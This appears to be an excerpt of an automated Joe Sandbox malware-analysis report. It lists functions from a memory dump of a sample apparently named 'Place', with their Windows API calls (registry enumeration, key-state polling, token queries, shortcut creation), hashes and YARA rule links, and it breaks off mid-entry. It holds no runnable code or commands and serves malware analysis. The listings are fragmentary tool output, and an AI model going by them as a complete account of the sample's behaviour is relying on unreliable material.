Instruction Fuzzy Hash: D48171756043029FD720EF64D84AB2ABBE5BF84710F14891DFD55AB392E7B4AC408F51

Function 00600697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 0060147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0060040D,?,?), ref: 00601491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0060075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0060079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006007E3
RegCloseKey.ADVAPI32(?,?), ref: 0060080F
RegCloseKey.ADVAPI32(00000000), ref: 0060081C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: e281906707bbc94de7dd6621b8ad9674252db999c17ece35b41196edfffdf84f
Instruction ID: 61d2ee99dcaccede802dca60697e55d22e7056d71a35000b8c897df8995df650
Opcode Fuzzy Hash: e281906707bbc94de7dd6621b8ad9674252db999c17ece35b41196edfffdf84f
Instruction Fuzzy Hash: 22517F31248206AFDB14EF64C885FABBBE9FF88304F04891DF99587291DB70E905CB52

Function 005EEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005EEC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005EEC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 005EECCA

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 005EECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005EECF7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b2f780c523235fc080c526ad1cbca0d6e04ca4d717828ddff1ec3ef985f6dce2
Instruction ID: a6a6a8945580e732526b5059aeac1a100167ebae0735b2cc200a5a39f4878253
Opcode Fuzzy Hash: b2f780c523235fc080c526ad1cbca0d6e04ca4d717828ddff1ec3ef985f6dce2
Instruction Fuzzy Hash: 99516B35A00106DFCB05EF64C989AAEBBF5FF48314B188099E849AB361DB31ED51CF50

Function 0060A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b504a02fbe8b33882bf87d8e9b0af5c862e011dee576c7cf95d4553a4be7bb9b
Instruction ID: 9bf959073235012c82b7dc7b135f3e8181ff161d2d491d96c40a02cd77aa5399
Opcode Fuzzy Hash: b504a02fbe8b33882bf87d8e9b0af5c862e011dee576c7cf95d4553a4be7bb9b
Instruction Fuzzy Hash: 7541D539940214AFD728DFA4CC44FEBBBB7EB09390F148165F916A72D1C7709D41DA51

Function 00582714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00582727
ScreenToClient.USER32(006477B0,?), ref: 00582744
GetAsyncKeyState.USER32(00000001), ref: 00582769
GetAsyncKeyState.USER32(00000002), ref: 00582777

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9e248f1d3059370b2a7d749b39744923db5520f0ccdd09f71da5ecc7fb1a8d61
Instruction ID: 8d81ad243172ad3ac91f858c96f774dfb8852b154d530b5f70c4f54cab61c377
Opcode Fuzzy Hash: 9e248f1d3059370b2a7d749b39744923db5520f0ccdd09f71da5ecc7fb1a8d61
Instruction Fuzzy Hash: 36417F75504109FFDF199F69C844AE9BFB5FB05324F50835AF828E22A0C730AD90DB95

Function 005D95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 005D95E8
PostMessageW.USER32(?,00000201,00000001), ref: 005D9692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 005D969A
PostMessageW.USER32(?,00000202,00000000), ref: 005D96A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005D96B0

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6c97fa145ebc4897e5d35c115490ac1b393f5ad3d8cb2583c5b169272fd834f9
Instruction ID: 05ff2e583fc47f45997a4b30054ecb40cb3811ad7718e110b367e4e3d0941692
Opcode Fuzzy Hash: 6c97fa145ebc4897e5d35c115490ac1b393f5ad3d8cb2583c5b169272fd834f9
Instruction Fuzzy Hash: 4D31AD71500219EFDF24CF68D94DADE3FA5FB44315F10821AF924AA2D0C3B0D964DB90

Function 0060B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

GetWindowLongW.USER32(?,000000F0), ref: 0060B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0060B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0060B841
GetSystemMetrics.USER32(00000004), ref: 0060B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,005F155C,00000000), ref: 0060B888

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 2a9aabcc978be50f55fea61925e181aa93993426a2eefd7cd3f0fcd85828455a
Instruction ID: 525b7d5973d31129785eec7d784808ee94e1c7f0942aa2d5580246545ac934d0
Opcode Fuzzy Hash: 2a9aabcc978be50f55fea61925e181aa93993426a2eefd7cd3f0fcd85828455a
Instruction Fuzzy Hash: 43217171A54215AFCF189F388C08AAA3BAAFB45724F14D739F925D62E0D7709851CB90

Function 005F6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 005F6159
GetForegroundWindow.USER32 ref: 005F6170
GetDC.USER32(00000000), ref: 005F61AC
GetPixel.GDI32(00000000,?,00000003), ref: 005F61B8
ReleaseDC.USER32(00000000,00000003), ref: 005F61F3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3cb8b390d0ff88c7f0e1f97e9d0608c0a8c2506489aa17030b9633d84d877817
Instruction ID: 284fb257d6e05087f402b68b1d2f38eb24b9718acea27bc76c60860428203587
Opcode Fuzzy Hash: 3cb8b390d0ff88c7f0e1f97e9d0608c0a8c2506489aa17030b9633d84d877817
Instruction Fuzzy Hash: 37216575600204AFD714EF65DD88AAABBF5FF88310F04C469E949D7252DA74AC40CB90

Function 005816CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00581729
SelectObject.GDI32(?,00000000), ref: 00581738
BeginPath.GDI32(?), ref: 0058174F
SelectObject.GDI32(?,00000000), ref: 00581778

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 82f0627868de38de5bb7d4ea05f16a2ded44d3dcfd29042ea50291f1a40c9c66
Instruction ID: 2b230009200471e785230532b704275f206e591d96e6544ba042a50dbdfbf858
Opcode Fuzzy Hash: 82f0627868de38de5bb7d4ea05f16a2ded44d3dcfd29042ea50291f1a40c9c66
Instruction Fuzzy Hash: 7D21C534904608EFDB10AF65DD48BA97FEEF701321F14522AFC15A61A0D7B09992CF94

Function 005DC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 005DC84C
_memcmp.LIBCMT ref: 005DC86A
_memcmp.LIBCMT ref: 005DC87D
_memcmp.LIBCMT ref: 005DC895
_memcmp.LIBCMT ref: 005DC8AD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5db09acd058d6f7d8a46c5cc9b338a683ab14392499b8e9cab1fbaf1098e6155
Instruction ID: f96adc4ad0ee7b5fa234a02e59701041fff0cddbd1207cf0ef879e30e7063f8c
Opcode Fuzzy Hash: 5db09acd058d6f7d8a46c5cc9b338a683ab14392499b8e9cab1fbaf1098e6155
Instruction Fuzzy Hash: A9010072A842173B962061189D86EEB6F1CBB61384F084027FE0697741E660DE00E2E4

Function 005E504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005E5075
__beginthreadex.LIBCMT ref: 005E5093
MessageBoxW.USER32(?,?,?,?), ref: 005E50A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005E50BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005E50C5

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 091f81369b8f7f8c82e2e90f7dec9a99a8f6fbbd1044ff6f99d57eeabbc8f6ce
Instruction ID: 7a6a92c57904dbbe85803264b8ca0ccb8132cbb7a4451c52a766c4c892f1f69e
Opcode Fuzzy Hash: 091f81369b8f7f8c82e2e90f7dec9a99a8f6fbbd1044ff6f99d57eeabbc8f6ce
Instruction Fuzzy Hash: 9111087A908748BFDB058FA99C08ADB7FAEBB46324F144256F814D3350E7B19A4087F0

Function 005D8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005D8E3C
GetLastError.KERNEL32(?,005D8900,?,?,?), ref: 005D8E46
GetProcessHeap.KERNEL32(00000008,?,?,005D8900,?,?,?), ref: 005D8E55
HeapAlloc.KERNEL32(00000000,?,005D8900,?,?,?), ref: 005D8E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005D8E73

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 3aa450b2cb0bac77afdd6f2bb251b26f676ff8c2c61f952faa24677ce1dedf46
Instruction ID: 26a542b13194b639ed72875072129d66b1c329adbc68d8e692e2676afabe40df
Opcode Fuzzy Hash: 3aa450b2cb0bac77afdd6f2bb251b26f676ff8c2c61f952faa24677ce1dedf46
Instruction Fuzzy Hash: 3D016D70200204BFEF204FAADC49DAB7FBEFF89354B14452BF849C2220DA719C50CA60

Function 005E57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005E581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005E5829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 005E5831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 005E583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005E5877

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 71151cd0a5ac4c7335350b748fe2fdf7d114b0d4a40f9426661982fda09e0127
Instruction ID: fcccf4a956b2ce810a801d52e81b5b81ef43152877b6f24c175d338b8a493c80
Opcode Fuzzy Hash: 71151cd0a5ac4c7335350b748fe2fdf7d114b0d4a40f9426661982fda09e0127
Instruction Fuzzy Hash: E8018B31C05A1DABDF189FF6D8499EDBF79BB08301F108456E441F2140EB749550CBA1

Function 005D8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005D8CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005D8CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005D8CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005D8CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005D8D14

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9d012e77ead47667eec8f1d09272e98e074d3b73978f6847dea66928462e418b
Instruction ID: e4192c7f45ef3802cea317090f84016515ad06fb4b62b29981e26aff74d0def7
Opcode Fuzzy Hash: 9d012e77ead47667eec8f1d09272e98e074d3b73978f6847dea66928462e418b
Instruction Fuzzy Hash: E5F08134200204BFEF201FA5DC89FB73B6EFF49755B148017F50486290CAA09C80DB60

Function 005D8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005D8D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D75

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c378af63bac4d7fb98d71943c5c61b58fa467ba8a4333f3c82e7b99c5ea2dc88
Instruction ID: 0d3cd2fe9f4850b4399d6aa8f95d086274aef0db563f856493a94fc98b0974a7
Opcode Fuzzy Hash: c378af63bac4d7fb98d71943c5c61b58fa467ba8a4333f3c82e7b99c5ea2dc88
Instruction Fuzzy Hash: 99F08C30240204AFEB211FA9EC88FB73BAEFF49755F084117F94586290CAA09E80DA60

Function 005DCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 005DCD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 005DCDA7
MessageBeep.USER32(00000000), ref: 005DCDBF
KillTimer.USER32(?,0000040A), ref: 005DCDDB
EndDialog.USER32(?,00000001), ref: 005DCDF5

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5ef86f902859b160c0e29423dff681548d47ab92a01f2971e3ff834400bfdfca
Instruction ID: 70ea219a20935deea3a43c214d89230e44298c8d6cb1a8373c83eb36b7faee5c
Opcode Fuzzy Hash: 5ef86f902859b160c0e29423dff681548d47ab92a01f2971e3ff834400bfdfca
Instruction Fuzzy Hash: E3018F30500749ABFF306B24DD4EBA67F7ABB40701F04466BA682A11E1DBF0A994CB90

Function 0058178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0058179B
StrokeAndFillPath.GDI32(?,?,005BBBC9,00000000,?), ref: 005817B7
SelectObject.GDI32(?,00000000), ref: 005817CA
DeleteObject.GDI32 ref: 005817DD
StrokePath.GDI32(?), ref: 005817F8

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e2deb870c5daf0a8d3f63209b55542ef14004ef4e77c3db706986726ac293c74
Instruction ID: 43b9e91b86d384f1dcfa06d4315e31f05481a0d740a8c504547d795cea0e8c1b
Opcode Fuzzy Hash: e2deb870c5daf0a8d3f63209b55542ef14004ef4e77c3db706986726ac293c74
Instruction Fuzzy Hash: E1F01D34018608AFEB116F15ED0C7583FA6F701326F08A265E829941F0C7704696DF54

Function 005EC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005ECA75
CoCreateInstance.OLE32(00613D3C,00000000,00000001,00613BAC,?), ref: 005ECA8D

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

CoUninitialize.OLE32 ref: 005ECCFA

Strings

.lnk, xrefs: 005ECA09, 005ECA31, 005ECA3B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: e0e7cf11df7458f3566f029da3b8326ef82a9ad64f38c25d3379b9118a99b891
Instruction ID: 3e2b7c8a939bef8a76fd5eb78d65b37e4a0e43d095331ff74066c0f508e9fd5b
Opcode Fuzzy Hash: e0e7cf11df7458f3566f029da3b8326ef82a9ad64f38c25d3379b9118a99b891
Instruction Fuzzy Hash: B9A13A71104206AFD704EF64C885EABBBE8FF94704F40491DF95697292EB70EE49CB92

Function 0058E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 005A0FE6: std::exception::exception.LIBCMT ref: 005A101C
Part of subcall function 005A0FE6: __CxxThrowException@8.LIBCMT ref: 005A1031

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 00591680: _memmove.LIBCMT ref: 005916DB

